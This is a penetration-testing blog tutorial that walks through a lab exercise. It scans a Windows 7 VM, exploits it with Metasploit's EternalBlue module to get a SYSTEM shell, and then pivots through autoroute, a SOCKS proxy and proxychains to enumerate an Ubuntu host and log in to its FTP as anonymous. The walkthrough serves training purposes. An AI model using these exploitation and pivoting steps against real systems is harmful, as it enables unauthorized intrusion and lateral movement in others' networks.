Pivoting with Metasploit and proxy chains is a sophisticated technique used by penetration testers to navigate through a network by leveraging a compromised system. This post will introduce the art of pivoting using Metasploit’s autoroute and socks_proxy modules, illustrating how to extend your reach within a target environment discreetly and effectively. We’ll explore the setup and application of these tools, providing a foundation for you to conduct thorough security assessments and network explorations. Join us as we unravel the steps to pivot with precision, maintaining stealth in the layered digital landscape.
Today we will explain how to perform the technique called «Pivoting» with Metasploit Framework but first of all we will need our own lab:
- Kali Linux, Parrot, etc.
- Windows 7/10 with vulnerability (EternalBlue).
- Ubuntu with vulnerability.
Once we already have our virtual machines deployed we will need to configure the networks. I recommend to connect the virtual machines between them using internal networks:
When we already have our laboratory working correctly we can start.
Pivoting with Metasploit
For this laboratory we will do a pentest simulation so let’s start with the lab.
Windows 7 – First machine
Let’s start with the first machine just running from our Kali Linux to recognize the new server into the NAT Network:
sudo nmap -sP 192.168.1.0/24
Starting Nmap 7.93 ( <https://nmap.org> ) at 2023-11-08 14:33 CET Nmap scan report for 192.168.1.1 Host is up (0.00015s latency). MAC Address: 0A:00:27:00:00:03 (Unknown) Nmap scan report for 192.168.1.2 Host is up (0.00027s latency). MAC Address: 08:00:27:03:0E:D8 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.1.5 Host is up (0.00059s latency). MAC Address: 08:00:27:9F:52:C7 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.1.3 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 28.03 seconds
We can see that we have detected the IP 192.168.1.5 probably it will be our objective. Let’s scan the host deeper:
sudo nmap -n -Pn -sS -sVC -p- --min-rate=2000 192.168.1.5 -v
PORT STATE SERVICE VERSION 21/tcp open tcpwrapped 80/tcp open http Microsoft IIS httpd 7.5 |_http-title: IIS7 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7600 microsoft-ds (workgroup: WORKGROUP) 45621/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Bad Request |_http-server-header: Microsoft-HTTPAPI/2.0 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC MAC Address: 08:00:27:9F:52:C7 (Oracle VirtualBox virtual NIC) Service Info: Host: W7-PIVOTING; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2023-11-08T13:40:01 |_ start_date: 2023-11-08T13:33:33 |_clock-skew: mean: -19m52s, deviation: 34m37s, median: 6s | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 210: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 7 Professional 7600 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::-:professional | Computer name: W7-Pivoting | NetBIOS computer name: W7-PIVOTING\\x00 | Workgroup: WORKGROUP\\x00 |_ System time: 2023-11-08T14:40:01+01:00 | nbstat: NetBIOS name: W7-PIVOTING, NetBIOS user: <unknown>, NetBIOS MAC: 0800279f52c7 (Oracle VirtualBox virtual NIC) | Names: | W7-PIVOTING<00> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1e> Flags: <group><active> | W7-PIVOTING<20> Flags: <unique><active> | WORKGROUP<1d> Flags: <unique><active> |_ \\x01\\x02__MSBROWSE__\\x02<01> Flags: <group><active>
We can see that the machine has SMB ports open so let’s enumerate SMB ports and execute all the SMB scripts for more information. Also based into the Windows version we should check if we can exploit EthernalBlue:
sudo nmap -n -Pn -p 445 --script smb-vuln-ms17-010 --min-rate=2000 192.168.1.5 -v
PORT STATE SERVICE 445/tcp open microsoft-ds MAC Address: 08:00:27:9F:52:C7 (Oracle VirtualBox virtual NIC) Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143> | <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/> |_ <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> NSE: Script Post-scanning. Initiating NSE at 15:06 Completed NSE at 15:06, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
We can see that the objective is vulnerable to EternalBlue so let’s try if we can exploit it with metasploit:
Now we can configure the exploit and run it:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.5 RHOSTS => 192.168.1.5 msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.3 LHOST => 192.168.1.3 msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 7 target => 7 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
After exploit the vulnerability we will see that we have opened a new session on meterpreter:
If we check which user currently we are we will see that we have control over the objective:
meterpreter > getuid Server username: NT AUTHORITY\\SYSTEM
No we already no we have complete access to the machine and we should enumerate the machine looking for more information (in our case we know that we should pivot to another machine) so let’s start enumerating the networks:
meterpreter > ipconfig
We will discover a new network (192.168.141.3/24):
To enumerate more the new network with metasploit and perform pivoting over the new sessions we should put the session in backgroud with the combination “Control + z”:
Now we have our session waiting for us. Let’s configure our tunnel to perform pivoting over our objective. To start we will use the autoroute module:
msf6 exploit(windows/smb/ms17_010_eternalblue) > use multi/manage/autoroute
If we check the options of the module we will see what we need to configure the parameters “SESSION” and “SUBNET”:
Let’s configure them and add the network:
msf6 post(multi/manage/autoroute) > set SESSION 1 SESSION => 1 msf6 post(multi/manage/autoroute) > set SUBNET 192.168.141.0/24 SUBNET => 192.168.141.0/24 msf6 post(multi/manage/autoroute) > run [!] SESSION may not be compatible with this module: [!] * incompatible session platform: windows [*] Running module against W7-PIVOTING [*] Searching for subnets to autoroute. [+] Route added to subnet 192.168.1.0/255.255.255.0 from host's routing table. [+] Route added to subnet 192.168.141.0/255.255.255.0 from host's routing table. [*] Post module execution completed
We can check if we added correctly the new route:
msf6 post(multi/manage/autoroute) > route
Now we are capable to reach the new network we have discovered with all the modules in Metasploit but what happen if we want to use an external tool? We will use the auxiliary module “socks_proxy” to use it after with proxychains and then we will use external tools through the tunnel we have created:
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
Now for the first tunnel we will change the “SRVHOST” and the version of socks:
Now we can check if the proxy is listening:
After check that the proxy is working properly we will configure our proxychains configuration file:
And we will put our proxy into the “ProxyList” with the same version and port that we have configured in metasploit:
Ubuntu – Second machine
Now we can check if we can reach with proxychains the new network with NMAP doing «Pivoting». Let’s try if we can identify new hosts:
proxychains nmap -sP --min-rate=2000 192.168.141.0/24
We will discover one new host:
Now we can perform more enumeration over this new objective:
proxychains nmap -n -Pn -sV 192.168.141.4
We will see that the server is running these services:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) 80/tcp open tcpwrapped 111/tcp open rpcbind 2-4 (RPC #100000) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Let’s deep dive into each port to see if we can discover any vulnerability or default configuration. To start we will start analyzing the Port 21 vSFTPd 3.0.2:
proxychains nmap -n -Pn -sVC -p 21 192.168.141.4
While is executing our scan we can try to reach the port manually:
proxychains ftp 192.168.141.4
If we try to log in with “anonymous” user we will see that we can use it:
In the end this is the method to do if we want to perform pivoting using Metasploit and proxychains.
Video of the post in Spanish version:
🔒 Hardsoft Security offers cybersecurity consulting services, ensuring that your business is always protected against the latest threats. And if you’re looking for hosting that puts security first, Secure Hosting is your ideal solution. We help keep your website safe with the best cybersecurity practices through our specialized cybersecurity advice.
(Cybersecurity is not a luxury, but a necessity. Protect your investment and your online reputation.)